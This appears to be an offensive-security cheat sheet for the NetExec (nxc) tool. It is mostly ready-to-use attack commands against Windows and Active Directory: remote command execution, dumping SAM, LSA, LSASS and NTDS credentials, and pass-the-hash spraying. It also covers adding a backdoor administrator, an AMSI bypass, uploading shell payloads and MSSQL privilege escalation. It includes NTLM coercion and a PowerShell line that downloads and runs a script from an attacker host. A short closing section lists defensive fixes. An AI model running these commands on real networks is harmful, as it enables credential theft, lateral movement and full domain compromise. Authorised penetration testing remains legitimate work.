๐ก๏ธ Methodology Checklist
- Remote code execution โ CMD:
nxc smb [TARGET] -u [USER] -p [PASS] -x "whoami" - Remote code execution โ PowerShell:
nxc smb [TARGET] -u [USER] -p [PASS] -X "Get-Process" - SAM dump:
nxc smb [TARGET] -u [USER] -p [PASS] --sam - LSA dump:
nxc smb [TARGET] -u [USER] -p [PASS] --lsa - LSASS dump:
nxc smb [TARGET] -u [USER] -p [PASS] -M lsassy - NTDS dump (DC only):
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds - PtH across subnet:
nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth - Spider shares:
nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus
๐ฏ Operational Context
Use when: Valid credentials or hash obtained โ use nxc to extract secrets, dump SAM/LSA/NTDS, and run commands across multiple hosts.
Think Dumber First: nxc smb [TARGETS] -u [USER] -p [PASS] --sam dumps SAM across all targets with one command. --lsa for LSA secrets (service account creds). --ntds on DCs for full domain hash dump.
Skip when: Only one target and direct access available โ Mimikatz or impacket-secretsdump directly may be faster.
โก Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "[CMD]" | Execute CMD command on target (requires admin) |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "[PS_CMD]" | Execute PowerShell with auto AMSI bypass |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --sam | Dump local SAM hashes |
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds | Dump entire NTDS.dit (all domain hashes) from DC |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsa | Dump LSA secrets + cached domain credentials (DCC2) |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy | Dump LSASS via lsassy module |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump | Dump LSASS via Sysinternals ProcDump |
nxc [PROTOCOL] [TARGET_IP] -u [USER] -H [NTLM_HASH] | Pass-the-Hash authentication |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --put-file [LOCAL] [REMOTE] | Upload file to SMB share |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file [REMOTE] [LOCAL] | Download file from SMB share |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern [STRING] | Spider share for filename patterns |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M spider_plus -o EXCLUDE_DIR=IPC$,print$ | Full recursive share spider with JSON index |
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M rdp -o ACTION=enable | Enable RDP on target |
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv | Find MSSQL privilege escalation paths |
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv -o ACTION=privesc | Escalate MSSQL privileges |
๐ฌ Deep Dive & Workflow
Remote Execution (Requires admin โ โ(Pwn3d!)โ)
# CMD execution
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "whoami /priv"
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "net user [NEW_USER] [PASS] /add && net localgroup administrators [NEW_USER] /add"
# PowerShell execution (AMSI auto-bypassed)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "Get-MpComputerStatus"
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "IEX(IWR http://[LHOST]/shell.ps1 -UseBasicParsing)"
# If -X fails (payload too long): use hosted stager
nxc smb [TARGET_IP] -u [USER] -p [PASS] --amsi-bypass amsi_bypass.txt -X "[PAYLOAD]"Secret Dumping Hierarchy
# 1. SAM (local hashes โ all machines)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --sam
# โ MACHINE\Administrator:[NTLM] โ PtH to this machine
# โ Local admin reuse: try hash on other machines
# 2. LSA (service account creds, cached domain creds)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsa
# โ Cleartext creds for service accounts
# โ DCC2 hashes (slower to crack, mode 2100)
# 3. LSASS (logged-on user credentials)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy
# โ If AV blocks lsassy, try: -M procdump or -M nanodump
# 4. NTDS.dit (ALL domain account hashes โ DC only)
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds
# โ Dumps via VSS โ requires DC admin
# โ Complete domain hash dump for PtH / offline crackingPass-the-Hash with NetExec
# PtH to verify lateral movement
nxc smb [TARGET_IP] -u Administrator -H [NTLM_HASH] --local-auth
# โ (Pwn3d!) = local admin confirmed
# PtH for domain account
nxc smb [TARGET_IP] -u [DOMAIN_USER] -H [NTLM_HASH]
# Spray hash across subnet
nxc smb 172.16.5.0/23 -u Administrator -H [NTLM_HASH] --local-auth
# โ Finds all machines where this local admin hash is reused
# WinRM access
nxc winrm [TARGET_IP] -u [USER] -H [NTLM_HASH]
# โ (Pwn3d!) = can enter-pssessionSMB File Operations
# Upload payload
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share C$ --put-file /tmp/shell.exe \\Windows\\Temp\\shell.exe
# Download loot
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share C$ --get-file \\Users\\Administrator\\Desktop\\creds.txt /tmp/creds.txt
# Spider share for files matching pattern
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx"
# Deep spider with content search
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider SYSVOL --content --regex "password"
# Full recursive spider (generates JSON index of all accessible files)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M spider_plus -o EXCLUDE_DIR=IPC$,print$
# โ Output in ~/.nxc/workspaces/default/spider_plus/MSSQL Post-Exploitation
# Test MSSQL with AD auth
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN]
# Test with local SQL auth
nxc mssql [TARGET_IP] -u sa -p [PASS] --local-auth
# Find privesc paths
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv
# โ Shows: db_owner โ sysadmin path, EXECUTE AS, impersonation
# Escalate to sysadmin
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv -o ACTION=privesc
# Execute command after escalation
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -x "xp_cmdshell 'whoami'"NTLM Coercion for Hash Capture
# Drop LNK file on writable share โ triggers NTLM auth to attacker
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M slinky -o SERVER=[LHOST] NAME=test
# Drop Search Connector on share
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M drop-sc -o URL=\\\\[LHOST]\\share SHARE=Public
# Capture with Responder running on attacker
sudo responder -I [IFACE] -wv๐ ๏ธ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc โsam returns access denied | Not admin on target | Verify: nxc smb [TARGET] -u [USER] -p [PASS] shows Pwn3d! first |
| nxc โntds hangs | DC overloaded or timeout | Add --ntds drsuapi for faster method; or --ntds vss for VSS-based dump |
| -x command fails | WMI not enabled | Try -X for PowerShell execution; or use --exec-method smbexec |
| nxc โlsa returns only DPAPI secrets | No service account creds | LSA secrets only contain local data; service account creds in NTDS on DC |
| Command output truncated | Long output | Pipe to file on target: -x 'cmd /c systeminfo > C:\Temp\out.txt' then retrieve file |
๐ Reporting Trigger
Finding Title: NetExec Mass Credential Extraction Across Multiple Hosts Impact: Single-command credential extraction via nxc across multiple hosts provides complete credential inventory for the environment, enabling password reuse identification and lateral movement path mapping. Root Cause: Local administrator account shared across multiple hosts (no LAPS). Admin access on one host enables credential extraction from all hosts with shared password. Recommendation: Deploy LAPS immediately. Alert on bulk remote SAM/LSA dump attempts. Implement Credential Guard on all Windows 10+ endpoints. Restrict admin access to designated management accounts.